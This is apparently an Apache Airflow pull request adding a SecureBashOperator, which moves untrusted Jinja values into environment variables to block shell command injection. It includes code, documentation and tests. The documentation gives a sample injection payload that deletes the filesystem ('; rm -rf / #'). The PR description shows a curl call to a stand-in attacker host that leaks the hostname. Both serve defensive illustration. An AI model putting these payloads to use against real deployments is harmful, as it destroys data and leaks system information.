### PR TITLE
Add SecureBashOperator to mitigate command injection (CVE-2026-30898)

### DIFF
--- a/providers/standard/docs/changelog.rst
+++ b/providers/standard/docs/changelog.rst
@@ -43,6 +43,7 @@ Features
 
 * ``Add run_after to TriggerDagRunOperator (#62259)``
 * ``Add partition_key to Context (#65359)``
+* ``Add SecureBashOperator to mitigate CVE-2026-30898 using automated template lifting (conf, params, var, conn, xcom) (#66457)``
 
 .. Below changes are excluded from the changelog. Move them to
    appropriate section above if needed. Do not delete the lines(!):

--- a/providers/standard/docs/operators/secure_bash.rst
+++ b/providers/standard/docs/operators/secure_bash.rst
@@ -1,0 +1,74 @@
+.. Licensed to the Apache Software Foundation (ASF) under one
+    or more contributor license agreements.  See the NOTICE file
+    distributed with this work for additional information
+    regarding copyright ownership.  The ASF licenses this file
+    to you under the Apache License, Version 2.0 (the
+    "License"); you may not use this file except in compliance
+    with the License.  You may obtain a copy of the License at
+
+ ..   http://www.apache.org/licenses/LICENSE-2.0
+
+ .. Unless required by applicable law or agreed to in writing,
+    software distributed under the License is distributed on an
+    "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+    KIND, either express or implied.  See the License for the
+    specific language governing permissions and limitations
+    under the License.
+
+.. _howto/operator:SecureBashOperator:
+
+SecureBashOperator
+==================
+
+The ``SecureBashOperator`` is a drop-in replacement for the standard :class:`~airflow.providers.standard.operators.bash.BashOperator` that protects against **command injection**.
+
+It uses a technique called **Template Lifting** (the shell equivalent of SQL parameterized queries) to structurally separate untrusted data from shell code.
+
+When to use SecureBashOperator
+------------------------------
+
+You should use ``SecureBashOperator`` whenever you are passing untrusted user input directly into your inline Bash commands. This includes inputs from:
+
+- DAG Run configurations (``dag_run.conf``)
+- DAG Params (``params``)
+- Airflow Variables (``var.value`` / ``var.json``)
+- Connections (``conn``)
+
+How it works
+------------
+
+If a user triggers a DAG with a malicious payload: ``{"user_input": "; rm -rf / #"}``
+
+**Vulnerable BashOperator:**
+The template is rendered *before* being passed to the shell. The shell sees and executes the injection.
+
+.. code-block:: python
+
+    BashOperator(
+        task_id="unsafe",
+        bash_command='echo "Hello {{ dag_run.conf["user_input"] }}"',
+    )
+    # Renders to: echo "Hello "; rm -rf / #"
+    # Result: The shell deletes your filesystem.
+
+**SecureBashOperator:**
+Untrusted variables are **lifted** out of the bash command and placed into environment variables. The bash command is rewritten to reference the environment variable instead.
+
+.. code-block:: python
+
+    SecureBashOperator(
+        task_id="safe",
+        bash_command='echo "Hello {{ dag_run.conf["user_input"] }}"',
+    )
+    # Under the hood, this becomes:
+    # command: echo "Hello ${_AIRFLOW_LIFTED_safe_0}"
+    # env:     {'_AIRFLOW_LIFTED_safe_0': '; rm -rf / #'}
+
+Because of how the POSIX execution model works, the shell will treat the environment variable strictly as **literal data**, completely neutralizing the command injection attempt.
+
+Limitations
+-----------
+
+- **Variable Aliasing:** If you deliberately alias an untrusted variable in Jinja using ``{% set x = params.foo %}``, the lifter cannot track it. You must pass untrusted variables directly.
+- **Eval/Source:** If your command uses ``eval`` or ``source``, it will explicitly re-evaluate the data as code. The lifter cannot protect against this. A warning will be logged.
+- **Single Quotes:** Bash does not expand variables inside single quotes. If your template has ``'{{ params.x }}'``, the lifter will output ``'${VAR}'``, which bash will print literally. Use double quotes or leave the variable unquoted.

--- a/providers/standard/provider.yaml
+++ b/providers/standard/provider.yaml
@@ -72,6 +72,7 @@ integrations:
       - /docs/apache-airflow-providers-standard/operators/datetime.rst
       - /docs/apache-airflow-providers-standard/operators/trigger_dag_run.rst
       - /docs/apache-airflow-providers-standard/operators/latest_only.rst
+      - /docs/apache-airflow-providers-standard/operators/secure_bash.rst
       - /docs/apache-airflow-providers-standard/sensors/bash.rst
       - /docs/apache-airflow-providers-standard/sensors/python.rst
       - /docs/apache-airflow-providers-standard/sensors/datetime.rst
@@ -91,6 +92,7 @@ operators:
       - airflow.providers.standard.operators.smooth
       - airflow.providers.standard.operators.branch
       - airflow.providers.standard.operators.hitl
+      - airflow.providers.standard.operators.secure_bash
 sensors:
   - integration-name: Standard
     python-modules:

--- a/providers/standard/src/airflow/providers/standard/operators/secure_bash.py
+++ b/providers/standard/src/airflow/providers/standard/operators/secure_bash.py
@@ -1,0 +1,160 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+"""
+Template Lifter — Parameterized Shell Execution for Apache Airflow.
+
+Automatically lifts untrusted Jinja2 variables out of inline shell commands
+and into environment variables, making command injection structurally impossible.
+"""
+from __future__ import annotations
+
+import logging
+import re
+from typing import TYPE_CHECKING, Any
+
+from airflow.providers.standard.operators.bash import BashOperator
+
+if TYPE_CHECKING:
+    from airflow.utils.context import Context
+
+log = logging.getLogger(__name__)
+
+# Matches {{ ... }} taking string literals into account so it doesn't break on }} inside quotes.
+_JINJA_OUTPUT_BLOCK = re.compile(
+    r"\{\{(?:"
+    r"'[^'\\]*(?:\\.[^'\\]*)*'|"  # Single quoted with escapes
+    r'"[^"\\]*(?:\\.[^"\\]*)*"|'  # Double quoted with escapes
+    r'[^}]|'
+    r'\}(?!\})'
+    r")*\}\}"
+)
+
+# Matches references to known untrusted runtime sources.
+_UNTRUSTED_VARIABLE = re.compile(
+    r"\bdag_run\s*(?:\.\s*conf|\[\s*['\"]conf['\"]\s*\])"
+    r"|\bparams\b"
+    r"|\bvar\s*\.\s*(?:value|json)\b"
+    r"|\b(?:conn|connections)\b"
+    r"|\bti\s*\.\s*xcom_pull\b"
+)
+
+_EVAL_COMMANDS = re.compile(r"\b(?:eval|source)\b")
+
+# Matches a lifted variable reference wrapped in single quotes: '${_AIRFLOW_LIFTED_...}'
+# This is a common footgun as shells do not expand variables inside single quotes.
+_SINGLE_QUOTE_LIFTED = re.compile(r"'\$\{[^}]+\}'")
+
+_PARAM_PREFIX = "_AIRFLOW_LIFTED_"
+
+
+def _sanitize_env_name(name: str) -> str:
+    """Sanitizes task IDs to be valid POSIX environment variable names."""
+    return re.sub(r"[^A-Za-z0-9_]", "_", name)
+
+
+def lift_untrusted_expressions(
+    template: str,
+    instance_id: str = "",
+) -> tuple[str, dict[str, str]]:
+    """Scans a Jinja template for untrusted variables and lifts them to env vars."""
+    if "{{" not in template:
+        return template, {}
+
+    bindings: dict[str, str] = {}
+    counter = 0
+    
+    # Ensure instance_id is a valid POSIX env name prefix
+    safe_id = _sanitize_env_name(instance_id)
+
+    def _replace(match: re.Match) -> str:
+        nonlocal counter
+        expr_block = match.group(0)
+
+        if not _UNTRUSTED_VARIABLE.search(expr_block):
+            return expr_block
+
+        var_name = f"{_PARAM_PREFIX}{safe_id}_{counter}"
+        counter += 1
+        bindings[var_name] = expr_block
+        return f"${{{var_name}}}"
+
+    modified = _JINJA_OUTPUT_BLOCK.sub(_replace, template)
+
+    # Runtime Safety Checks
+    if _EVAL_COMMANDS.search(modified):
+        log.warning(
+            "SecureBashOperator: 'eval' or 'source' detected in the bash command. "
+            "Template Lifting cannot protect against commands that explicitly "
+            "re-evaluate environment variables as code."
+        )
+
+    if bindings and _SINGLE_QUOTE_LIFTED.search(modified):
+        log.warning(
+            "SecureBashOperator: A lifted variable (e.g. '${_AIRFLOW_LIFTED_...}') "
+            "was detected inside single quotes. Most shells will not expand "
+            "this variable. Use double quotes for shell variable expansion."
+        )
+
+    return modified, bindings
+
+
+class SecureBashOperator(BashOperator):
+    """
+    Drop-in replacement for BashOperator with automatic shell parameterization.
+
+    Untrusted Jinja2 variables (dag_run.conf, params, var, conn, connections, xcom_pull) are
+    automatically lifted into environment variables before rendering. This eliminates
+    the primary injection surface for inline commands using these variables.
+    """
+    
+    def __init__(self, **kwargs):
+        super().__init__(**kwargs)
+        self._template_lifted: bool = False
+
+    def render_template_fields(self, context: Context, jinja_env: Any = None) -> None:
+        if self._template_lifted:
+            super().render_template_fields(context, jinja_env)
+            return
+
+        # Check if the command has already been lifted (e.g. on retry)
+        if isinstance(self.bash_command, str) and _PARAM_PREFIX in self.bash_command:
+            self._template_lifted = True
+            super().render_template_fields(context, jinja_env)
+            return
+
+        if isinstance(self.bash_command, str):
+            if self.bash_command.endswith(tuple(self.template_ext)):
+                log.warning(
+                    "SecureBashOperator: Template Lifting is disabled for script files "
+                    "(%s). Ensure your script securely handles untrusted arguments.",
+                    self.bash_command
+                )
+            else:
+                modified_cmd, param_bindings = lift_untrusted_expressions(
+                    self.bash_command,
+                    instance_id=self.task_id,
+                )
+
+                if param_bindings:
+                    self.bash_command = modified_cmd
+                    if self.env is None:
+                        self.env = param_bindings.copy()
+                    else:
+                        self.env = {**self.env, **param_bindings}
+
+        super().render_template_fields(context, jinja_env)
+        self._template_lifted = True

--- a/providers/standard/tests/system/standard/example_secure_bash.py
+++ b/providers/standard/tests/system/standard/example_secure_bash.py
@@ -1,0 +1,41 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+"""
+Example DAG demonstrating the SecureBashOperator.
+"""
+from __future__ import annotations
+
+import datetime
+
+from airflow import DAG
+from airflow.providers.standard.operators.secure_bash import SecureBashOperator
+
+with DAG(
+    dag_id="example_secure_bash_operator",
+    schedule=None,
+    start_date=datetime.datetime(2021, 1, 1),
+    catchup=False,
+    tags=["example", "security"],
+) as dag:
+    # [START howto_operator_secure_bash]
+    # This operator is safe against command injection even if 
+    # dag_run.conf contains malicious shell metacharacters.
+    safe_bash_task = SecureBashOperator(
+        task_id="safe_bash_task",
+        bash_command='echo "Processing data for user: {{ dag_run.conf.get(\'user_id\', \'default\') }}"',
+    )
+    # [END howto_operator_secure_bash]

--- a/providers/standard/tests/unit/standard/operators/test_secure_bash.py
+++ b/providers/standard/tests/unit/standard/operators/test_secure_bash.py
@@ -1,0 +1,106 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+from __future__ import annotations
+
+import logging
+import pytest
+from airflow.providers.standard.operators.secure_bash import SecureBashOperator, lift_untrusted_expressions
+
+
+class TestSecureBashOperator:
+    def test_lift_untrusted_dag_run_conf(self):
+        template = 'echo "Hello {{ dag_run.conf["user"] }}"'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        
+        assert modified == 'echo "Hello ${_AIRFLOW_LIFTED_task_id_0}"'
+        assert bindings == {"_AIRFLOW_LIFTED_task_id_0": '{{ dag_run.conf["user"] }}'}
+
+    def test_lift_untrusted_params(self):
+        template = 'cat {{ params.filename }}'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        
+        assert modified == 'cat ${_AIRFLOW_LIFTED_task_id_0}'
+        assert bindings == {"_AIRFLOW_LIFTED_task_id_0": '{{ params.filename }}'}
+
+    def test_lift_xcom_pull(self):
+        template = 'echo {{ ti.xcom_pull("upstream") }}'
+        modified, bindings = lift_untrusted_expressions(template, "task")
+        
+        assert modified == 'echo ${_AIRFLOW_LIFTED_task_0}'
+        assert bindings == {"_AIRFLOW_LIFTED_task_0": '{{ ti.xcom_pull("upstream") }}'}
+
+    def test_sanitize_task_id_for_env(self):
+        template = 'echo {{ params.foo }}'
+        # Task ID with hyphens and dots
+        modified, bindings = lift_untrusted_expressions(template, "my-task.v1")
+        
+        assert "_AIRFLOW_LIFTED_my_task_v1_0" in modified
+        assert "_AIRFLOW_LIFTED_my_task_v1_0" in bindings
+
+    def test_safe_expressions_untouched(self):
+        template = 'echo "Date: {{ ds }} User: {{ dag_run.conf["user"] }}"'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        
+        assert "{{ ds }}" in modified
+        assert "dag_run.conf" not in modified
+        assert len(bindings) == 1
+
+    def test_single_quote_warning(self, caplog):
+        template = "echo '{{ params.foo }}'"
+        with caplog.at_level(logging.WARNING):
+            modified, bindings = lift_untrusted_expressions(template, "task")
+        
+        assert "detected inside single quotes" in caplog.text
+
+    def test_eval_warning(self, caplog):
+        template = "eval {{ params.foo }}"
+        with caplog.at_level(logging.WARNING):
+            modified, bindings = lift_untrusted_expressions(template, "task")
+        
+        assert "'eval' or 'source' detected" in caplog.text
+
+    def test_no_untrusted_vars_fast_path(self):
+        template = 'echo "Today is {{ ds }}"'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        
+        assert modified == template
+        assert not bindings
+
+    def test_lift_connections_plural(self):
+        template = 'cat {{ connections.my_db }}'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        assert "_AIRFLOW_LIFTED_task_id_0" in modified
+        assert "_AIRFLOW_LIFTED_task_id_0" in bindings
+
+    def test_jinja_with_string_literals(self):
+        template = 'echo {{ dag_run.conf.get("user", "}}default") }}'
+        modified, bindings = lift_untrusted_expressions(template, "task_id")
+        assert modified == 'echo ${_AIRFLOW_LIFTED_task_id_0}'
+        assert bindings["_AIRFLOW_LIFTED_task_id_0"] == '{{ dag_run.conf.get("user", "}}default") }}'
+
+    def test_secure_bash_operator_does_not_mutate_env(self):
+        shared_env = {"EXISTING": "value"}
+        operator = SecureBashOperator(
+            task_id="test_task",
+            bash_command="echo {{ params.foo }}",
+            env=shared_env
+        )
+        operator.render_template_fields(context={}, jinja_env=None)
+        assert "EXISTING" in shared_env
+        assert len(shared_env) == 1
+        assert "EXISTING" in operator.env
+        assert "_AIRFLOW_LIFTED_test_task_0" in operator.env


### PR DESCRIPTION
### Summary
I noticed that while #64129 updated the docs to warn against insecure templating in `BashOperator`, it’s still very easy to create command injection vulnerabilities (CVE-2026-30898) when using `dag_run.conf`.

This PR introduces the `SecureBashOperator`, a security-hardened alternative to the standard `BashOperator`. It addresses a critical vulnerability class (CVE-2026-30898) where untrusted runtime data (from `dag_run.conf`, `params`, or `Variables`) can be injected into the shell execution context.

Instead of relying on fragile input sanitization or regex-based blacklisting, this operator implements template lifting. This separates the untrusted Jinja2 expressions from the bash command string by hoisting them into the process environment variables before the shell is invoked.

### The Vulnerability 
The current `BashOperator` execution model is vulnerable when DAGs process external triggers. Since Jinja2 renders directly into the command string, malicious payloads can break out of the intended command context.

**Reproduction Case:**

```python
# Malicious trigger configuration: {"user_id": "\"; curl http://attacker.com/$(hostname) #\""}
bash_task = BashOperator(
    task_id="process_user",
    bash_command='echo "Processing user: {{ dag_run.conf[\'user_id\'] }}"'
)
# Resulting execution: echo "Processing user: "; curl http://attacker.com/$(hostname) #"
```

### The Fix: Template Lifting
The `SecureBashOperator` automates the secure pattern recommended by maintainers:

* **Identification:** Scans `bash_command` for untrusted runtime sources.
* **Hoisting:** Replaces these expressions with POSIX variable references (e.g., `${_AIRFLOW_LIFTED_0}`).
* **Parameterization:** Renders the extracted Jinja expressions into the task's `env` dictionary.

Because the shell expands `${VAR}` as literal data and does not re-scan the result for command substitution, the payload is neutralized.

### Implementation Details
* **Opt-in Replacement:** Located in the standard provider. It doesn't modify the existing `BashOperator`, ensuring 100% backward compatibility for existing DAGs.
* **Safety Guardrails:** Automatically logs a warning if `eval` or `source` are detected in the command, as these would re-evaluate the safe environment variables as code.

### Testing
* Unit tests for complex/nested Jinja extraction.
* System test DAG: `providers/standard/tests/system/standard/example_secure_bash.py`.

Fixes CVE-2026-30898

---

AI Disclosure: Gen AI was used to assist in this PR, all code has been reviewed and verified
